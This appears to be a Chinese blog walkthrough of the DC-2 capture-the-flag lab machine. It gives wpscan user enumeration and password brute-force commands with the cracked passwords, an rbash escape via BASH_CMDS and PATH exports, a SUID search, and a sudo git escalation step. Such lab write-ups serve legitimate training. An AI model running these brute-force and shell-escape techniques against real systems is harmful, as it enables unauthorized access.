DC-2靶机渗透

靶机下载地址:http://www.five86.com/downloads/DC-2.zip

kali:192.168.1.125

靶机:192.168.1.117

🐧群号:703078198

扫描同网段的IP

对着这个ip进行扫描

发现打开了80端口,我们用浏览器访问一下

发现打不开

我们去配置文件,配置一下

vim /etc/hosts

我们加上这句

 保存,退出

再试试去访问一下

找到了第一个flag

 我们进行目录扫描看看有没有,有用的目录

 发现了一个后台登录的入口

我们得收集信息生成密码

我们用cewl爬取页面信息生成密码

我们收集到的信息都放到1.txt这个文件里了 

上wpscan直接爆破

wpscan --url dc-2 -e u

爆破了三个用户 admin、jerry、tom

我们开始进行爆破密码

wpscan --url dc-2 -P pwd.txt -U admin   //爆破admin的密码,无法爆出
wpscan --url dc-2 -P pwd.txt -U jerry   //爆破jerry密码为 adipiscing
wpscan --url dc-2 -P pwd.txt -U tom		//爆破tom密码为 parturient

 登入

 falg2在这

我们俩个账号登录一下ssh服务

ssh jerry@192.168.202.131 -p 7744   //-p是指定端口
ssh tom@192.168.202.131 -p 7744

发现只有tom的可以 

我们使用whoami查看一下当前权限

这里被限制了 

我们要绕过rbash

BASH_CMDS[a]=/bin/sh;a     #调用/bin/sh命令解释器
/bin/bash
export PATH=$PATH:/bin/    #设置环境变量
export PATH=$PATH:/usr/bin

这样我们获得了shell权限 

 我们登录jerry这个账户

 找到了flag4,在/home/jerry目录里

 接下来我们要提权

find / -perm -u=s -type f 2>/dev/null

 我们先

sudo -l

看看

 发现git有root权限

我们用git提权

http://dljz.nicethemes.cn/news/show-128128.html

找到最后一个flag值就结束了

在root目录

                                                     求个关注

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值